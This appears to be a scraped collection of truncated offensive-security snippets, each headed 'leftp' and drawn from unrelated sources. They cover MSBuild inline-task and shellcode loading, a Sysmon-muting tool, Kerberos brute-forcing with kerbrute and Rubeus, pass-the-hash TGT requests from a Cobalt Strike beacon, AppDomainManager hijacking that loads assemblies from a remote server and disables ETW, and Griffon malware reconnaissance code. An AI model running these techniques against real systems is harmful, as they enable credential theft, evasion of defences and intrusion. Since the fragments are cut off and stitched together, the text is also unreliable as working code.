leftp

#DISCLAIMER
#I'm not the original author of the script... 
#Original git repo vanished

function String-to-ByteArray ($String)
{
	$ByteArray=@()
	For ( $i = 0; $i -lt ($String.Length/2); $i++ ) 
	{
		$Chars=$String.Substring($i*2,2)

leftp

<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003" >
	<Target Name="Hello" >

	<!-- Call ANY .NET API -->
	<!-- 
	
		Author: Casey Smith, Twitter: @subTee
		 
		License: BSD 3-Clause
	

leftp

@echo off
REM °²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²°
REM °² Enumerates all files extensions                  ²°
REM °² and what opens them on Windows 10 in batch/cmd   ²°
REM °² twitter: @ollieatnccgroup                        ²°
REM °²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²°


REM ------------------------------------------------------
REM

leftp

using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Linq;
using System.Text;

namespace MuteSysmon
{
    class Program

leftp

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

leftp

This is a variation of the technique originally discovered by subtee and described here

TL;DR It essentially allows you to turn any .NET application into a lolbin by providing a configuration file and specifying the <appDomainManagerAssembly> element pointing to a specially crafted .NET assembly which executes when the application is loaded.

This variation allows you to load the AppDomainManager assembly from a UNC path or HTTP(s) server. Also disables ETW thanks to the <etwEnable> element :)

1. Copy some binary you love to say, C:\Test. Lets use aspnet_compiler.exe as an example
2. Compile test.cs to test.dll with a signed strong name, this is required to load an assembly outside of a .NET applications base directory.
3. Host test.dll on a remote SMB or HTTP(S) server

leftp

##### IF ELEVATED:

# grab a TGT b64 blob with a valid NTLM/rc4 (or /aes256:X)
beacon> execute-assembly /home/specter/Rubeus.exe asktgt /user:USER /rc4:NTLM_HASH

# decode the base64 blob to a binary .kirbi
$ base64 -d ticket.b64 > ticket.kirbi

# sacrificial logon session (to prevent the TGT from overwriting your current logon session's TGT)
beacon> make_token DOMAIN\USER PassWordDoesntMatter

leftp

Dim dnsname
dnsname= "canary.troubleshootdomain.com"
Set wmi = GetObject("winmgmts:")
Set response = wmi.ExecQuery("Select * from Win32_PingStatus WHERE address='" & dnsname & "'")

leftp

'' Griffon main actions start here.

Set file_system_object = CreateObject("Scripting.FileSystemObject")
temp_file_name = file_system_object.GetSpecialFolder(2) & "\" & file_system_object.GetTempName

' Start the detailed recon.
recon_info_str = get_network_adapter_info
network_info_str = ""
recon_info_str = recon_info_str & "SystemInfo" & "=" & get_system_info() & "&"
recon_info_str = recon_info_str & "SoftwareInfo" & "=" & get_product_or_process_info("Win32_Product") & "&"

leftp

1. Open PowerShell
2. Set MSbuild GodMode Env Variable 
   $env:MSBUILDENABLEALLPROPERTYFUNCTIONS = 1 
3. Execute C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe msbuild.png.xml
   Note: This "Serves" Shellcode in a memory mapped file. 
   This is no accessible to other processes. 
   Change in line 62 in shellcode.cs . Manual offsets just to troll you. :)
 I leave this for you to explore